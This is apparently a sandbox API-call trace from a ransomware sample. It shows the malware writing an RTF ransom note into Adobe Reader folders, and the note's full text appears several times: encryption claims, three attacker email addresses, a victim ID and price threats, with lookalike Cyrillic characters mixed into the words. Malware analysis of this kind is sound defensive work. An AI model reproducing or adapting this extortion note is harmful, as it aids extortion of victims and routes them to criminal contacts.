c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e971a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0070.821] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e971a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e971a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0070.824] CloseHandle (hObject=0x1bc) returned 1 [0070.824] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\bg85_info.rtf")) returned 0xffffffff [0070.824] GetLastError () returned 0x2 [0070.825] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, 